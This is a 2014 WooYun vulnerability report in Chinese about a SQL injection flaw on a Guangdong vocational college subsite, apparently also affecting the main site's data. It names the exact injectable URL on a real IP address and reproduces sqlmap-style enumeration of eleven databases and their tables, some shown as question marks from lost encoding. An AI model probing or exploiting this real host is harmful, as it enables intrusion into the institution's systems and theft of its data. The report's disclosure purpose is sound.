漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-076907
漏洞标题:广东科学职业技术学院教科处SQL注射漏洞,可影响主站数据,管理后台存在弱口令。
相关厂商:广东科学职业技术学院
漏洞作者: 第四维度
提交时间:2014-09-22 12:40
修复时间:2014-09-27 12:42
公开时间:2014-09-27 12:42
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-09-22: 细节已通知厂商并且等待厂商处理中
2014-09-27: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
分站的sql。数据可影响主站。
详细说明:
注入点:http://61.145.231.45:6543/web1/tzgg.asp?id=257
GET注入。
available databases [11]:
[*] 1117jwccatalog
[*] database1
[*] database33
[*] foundationbase
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] upload
表
Database: tempdb
[2 tables]
+--------------------------------------------+
| sysconstraints |
| syssegments |
+--------------------------------------------+
Database: database33
[5 tables]
+--------------------------------------------+
| dtproperties |
| sysconstraints |
| syssegments |
| ??????? |
| ??????? |
+--------------------------------------------+
Database: foundationbase
[10 tables]
+--------------------------------------------+
| D99_CMD |
| D99_Tmp |
| dtproperties |
| sysconstraints |
| syssegments |
| ???? |
| ???? |
| ???? |
| ???? |
| ???? |
+--------------------------------------------+
Database: upload
[10 tables]
+--------------------------------------------+
| admin |
| dtproperties |
| liuyan |
| mapfl |
| newplugin |
| plugin |
| setmap |
| sysconstraints |
| syssegments |
| upmap |
+--------------------------------------------+
Database: msdb
[78 tables]
+--------------------------------------------+
| RTblClassDefs |
| RTblDBMProps |
| RTblDBXProps |
| RTblDTMProps |
| RTblDTSProps |
| RTblDatabaseVersion |
| RTblEQMProps |
| RTblEnumerationDef |
| RTblEnumerationValueDef |
| RTblGENProps |
| RTblIfaceDefs |
| RTblIfaceHier |
| RTblIfaceMem |
| RTblMDSProps |
| RTblNamedObj |
| RTblOLPProps |
| RTblParameterDef |
| RTblPropDefs |
| RTblProps |
| RTblRelColDefs |
| RTblRelshipDefs |
| RTblRelshipProps |
| RTblRelships |
| RTblSIMProps |
| RTblScriptDefs |
| RTblSites |
| RTblSumInfo |
| RTblTFMProps |
| RTblTypeInfo |
| RTblTypeLibs |
| RTblUMLProps |
| RTblUMXProps |
| RTblVersionAdminInfo |
| RTblVersions |
| RTblWorkspaceItems |
| backupfile |
| backupmediafamily |
| backupmediaset |
| backupset |
| log_shipping_primaries |
| log_shipping_secondaries |
| logmarkhistory |
| mswebtasks |
| restorefilegroup |
| restorefilegroup |
| restorehistory |
| siweb3file |
| sqlagent_info |
| sysalerts |
| syscachedcredentials |
| syscategories |
| sysconstraints |
| sysdbmaintplan_databases |
| sysdbmaintplan_history |
| sysdbmaintplan_jobs |
| sysdbmaintplans |
| sysdownloadlist |
| sysdtscategories |
| sysdtspackagelog |
| sysdtspackages |
| sysdtssteplog |
| sysdtstasklog |
| sysjobhistory |
| sysjobs_view |
| sysjobs_view |
| sysjobschedules |
| sysjobservers |
| sysjobsteps |
| sysnotifications |
| sysoperators |
| syssegments |
| systargetservergroupmembers |
| systargetservergroups |
| systargetservers_view |
| systargetservers_view |
| systaskids |
| systasks_view |
| systasks_view |
+--------------------------------------------+
Database: pubs
[14 tables]
+--------------------------------------------+
| authors |
| discounts |
| employee |
| jobs |
| pub_info |
| publishers |
| roysched |
| sales |
| stores |
| sysconstraints |
| syssegments |
| titleauthor |
| titles |
| titleview |
+--------------------------------------------+
Database: master
[36 tables]
+--------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS |
| INFORMATION_SCHEMA.COLUMNS |
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES |
| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE |
| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE |
| INFORMATION_SCHEMA.DOMAINS |
| INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS |
| INFORMATION_SCHEMA.KEY_COLUMN_USAGE |
| INFORMATION_SCHEMA.PARAMETERS |
| INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS |
| INFORMATION_SCHEMA.ROUTINES |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS |
| INFORMATION_SCHEMA.SCHEMATA |
| INFORMATION_SCHEMA.TABLES |
| INFORMATION_SCHEMA.TABLE_CONSTRAINTS |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES |
| INFORMATION_SCHEMA.VIEWS |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE |
| MSreplication_options |
| spt_datatype_info_ext |
| spt_datatype_info_ext |
| spt_fallback_db |
| spt_fallback_dev |
| spt_fallback_usg |
| spt_monitor |
| spt_provider_types |
| spt_server_info |
| spt_values |
| sysconstraints |
| syslogins |
| sysoledbusers |
| sysopentapes |
| sysremotelogins |
| syssegments |
+--------------------------------------------+
Database: database1
[31 tables]
+--------------------------------------------+
| D99_CMD |
| D99_REG |
| D99_Tmp |
| Reg_Arrt |
| S3_Tmp |
| admain |
| comd_list |
| cyfd |
| dtproperties |
| jiaozhu |
| sqlmapoutput |
| sysconstraints |
| syssegments |
| t1 |
| t_jiaozhu |
| ???? |
| ??????? |
| ??? |
| ???? |
| ???? |
| ???? |
| ???? |
| ???? |
| ???? |
| ???? |
| ???? |
| ???? |
| ???? |
| ???? |
| ??????? |
| ???? |
+--------------------------------------------+
Database: model
[2 tables]
+--------------------------------------------+
| sysconstraints |
| syssegments |
+--------------------------------------------+
Database: Northwind
[31 tables]
+--------------------------------------------+
| Categories |
| CustomerCustomerDemo |
| CustomerDemographics |
| Customers |
| EmployeeTerritories |
| Employees |
| Invoices |
| Region |
| Shippers |
| Suppliers |
| Territories |
| Alphabetical list of products |
| Category Sales for 1997 |
| Current Product List |
| Customer and Suppliers by City |
| Order Details Extended |
| Order Details Extended |
| Order Subtotals |
| Orders Qry |
| Orders Qry |
| Product Sales for 1997 |
| Products Above Average Price |
| Products Above Average Price |
| Products by Category |
| Quarterly Orders |
| Sales Totals by Amount |
| Sales by Category |
| Summary of Sales by Quarter |
| Summary of Sales by Year |
| sysconstraints |
| syssegments |
+--------------------------------------------+
漏洞证明:
修复方案:
防注入,过滤敏感字符。
版权声明:转载请注明来源 第四维度@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2014-09-27 12:42
厂商回复:
最新状态:
暂无